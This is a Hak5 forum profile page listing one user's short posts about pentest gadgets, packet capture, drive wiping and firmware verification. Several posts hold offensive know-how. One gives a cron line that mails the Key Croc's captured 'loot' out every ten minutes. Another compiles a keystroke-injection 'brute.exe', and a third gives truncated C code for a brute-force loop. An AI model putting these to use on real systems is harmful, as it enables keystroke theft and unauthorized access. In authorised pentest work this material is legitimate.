Jump to content


Active Members
  • Content Count

  • Joined

  • Days Won


1 Follower

About kdodge

  • Rank
    Hak5 Zombie

Profile Information

  • Interests
    Hak5 Fan

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. One thing that I can think of is sometimes VM's don't network properly the way a real computer networks. It might be more of a pain, but try to setup a real Win10 over a real test network with a real network hub/switch. VM's are a really convenient system for lab work but they might be the reason for your current problems. Maybe not, but it's worth checking out.
  2. Technically, the packet shouldn't be more that 0xffff(65535) in size, but this is what the man page looks like for tcpdump: 0x40000(262144) is greater than 0xffff(65535), so you might be cutting off packets if you limit yourself to 65535. try using -s 0 which is setting it to the max size.
  3. And if they wont redirect it, you could have a little fun with them by buying an outdoor electric heating pad and leave it on your property, and turn it on an off at random, at all hours of the night. After a while they won't want it pointed at your property anymore.
  4. if you want to really get rid of anything left on the drive, you should zero it out first, then partition/format it to NTFS $ lsblk ### find the /dev/sdX of the usb drive $ sudo dd if=/dev/zero bs=512 of=/path/to/usb/drive status=progress just change the "/path/to/usb/drive" to what ever /dev/sdX your usb drive is at
  5. If you are deciding to "smash it", it might be a candidate to experiment with it a little bit Bus Pirate v3 might allow you to do some lower level testing. I've always wanted to buy one and play around with it but never have.
  6. Any chance you could create a OpenPGP cert and make some .sig file for the various firmwares? Hashes are great to verify if it downloaded completely/correctly but a .sig helps allow verification of authenticity.
  7. I'm hoping this is also their website, but I can't be certain. The SHA256 hash matches the listed hash on the downloads.hak5.org site https://www.wifipineapple.com/downloads/nano/2.7.0
  8. can you try: $ ls -l ~/Downloads/inject.bin or C:\> dir C:\Users\%USERNAME%\Downloads\inject.bin ?
  9. Oh i see, option 224 is a "reserved" space. https://www.iana.org/assignments/bootp-dhcp-parameters/bootp-dhcp-parameters.xhtml Its probably blocked normally, that's why you need to force it. I'm not sure how/if you can force something like that from uci, but I have not looked too deeply into that. I'm kind of curious if you tried uci add_list dhcp.lan.dhcp_option_force='224,"my_payload_string"' what would happen, if part of the uci configure would work like that.
  10. just an idea, have you tried playing around with these yet: https://openwrt.org/docs/guide-user/base-system/dhcp_configuration#dhcp_options ?
  11. I think the Twin Duck is a.k.a the Composite Duck https://github.com/hak5darren/USB-Rubber-Ducky/tree/master/Firmware/Source/Composite_Duck
  12. does the key croc have sendmail installed? $ crontab -e */10 * * * * echo -e "Subject:Loot\n" > sample_header.txt && tar cvf - /path/to/loot/folder/* | gzip -9 | base64 | cat sample_header.txt - | sendmail email@example.com && rm sample_header.txt This is untested, you may need to fiddle with it.
  13. With a Ubuntu/Mint/Kali distro (or probably any debian-base one), you grab the cross-compiling library MinGW from here: $ sudo apt-get update $ sudo apt-get install gcc-mingw-w64-x86-64 -y Grab the "brute.c" file and move it to your Desktop (or where ever you want to) $ cd ~/Desktop/ $ x86_64-w64-mingw32-gcc -o brute.exe brute.c And if there is no compiling errors, you should have a brand new "brute.exe" file on your Desktop that you will be able to run on a windows machine, and act just like(-ish) a ducky. It won't work for certain things like UAC bypass, and other things like t
  14. If you don't need the actual leveraging of a real keyboard, you might just be able to use a C script to do this: You would need to change the "main" to do what you need to do, maybe start with something like this: #include <windows.h> #include <stdio.h> #include <string.h> #include <stdint.h> /***rest of the functions here***/ int main(){ unsigned char launch[64]; uint32_t count = 0; gui_r(); Sleep(100); string("C:\\app\\software\\app.exe"); enter(); for(count = 0; count < 1000000; count++){ memset(launch, 0, sizeof(launch)); sp
  • Create New...